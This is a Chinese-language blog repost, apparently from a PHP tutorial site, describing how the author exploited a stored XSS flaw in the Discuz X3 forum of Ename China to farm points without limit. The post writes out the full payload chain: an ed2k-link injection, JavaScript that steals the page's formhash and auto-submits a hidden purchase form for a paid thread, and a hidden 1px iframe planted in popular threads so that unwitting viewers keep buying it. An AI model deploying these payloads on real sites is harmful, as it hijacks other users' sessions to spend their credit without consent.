网站地图    收藏   

主页 > 后端 > 网站安全 >

易名中国论坛XSS漏洞可无限刷玉米 - 网站安全

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 易名中国论坛XSS漏洞可无限刷玉米易名论坛DISCUZ X3程序,前段时间论坛爆出XSS漏洞,今天正好逛论坛就试了下,然后有了下面的刷玉米(积分)。随便找个帖子回复,然后插入连接,为...

易名中国论坛XSS漏洞可无限刷玉米

易名论坛DISCUZ X3程序,前段时间论坛爆出XSS漏洞,今天正好逛论坛就试了下,然后有了下面的刷玉米(积分)。

随便找个帖子回复,然后插入连接,为了方便后面的刷分 尽量找回复N多页的帖子,插入代码
ed2k://|file|test|'+document.write(String.fromCharCode())+'|test/


这里我插入的是自动购买主题的JS代码:

 

var vzhi =document.getElementsByName("formhash")[0].value;
document.write('<form id=payform name=payform method=post autocomplete=off action=forum.php?mod=misc&action=pay&paysubmit=yes&infloat=yes><br>')
document.write('<input type=hidden name=formhash value='+vzhi+'><br>')
document.write('<input type=hidden name=referer value=http://www.dnbbs.com/./ ><br>')
document.write('<input type=hidden name=tid value=869290><br>')
/*document.write('<input type=submit name=submit value='+vzhi+'>')*/
document.write('</form><br>')
setTimeout("document.payform.submit()",1000)


这样浏览这个帖子就会自动购买主题ID为869290的主题(主题设置收费),





然后选择热门帖子跟帖 插入另外一个

代码:

 

document.writeln("<iframe src=\"第一次回复帖子地址\" frameborder=\"0\" scrolling=\"No\" height=\"1px\" width=\"1px\"></iframe>");



然后不知不觉中主题被不断购买。。。

刚刚刷了几千分就被封了。。管理效率挺高的,赞一个。。没啥恶意啊。。。


自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论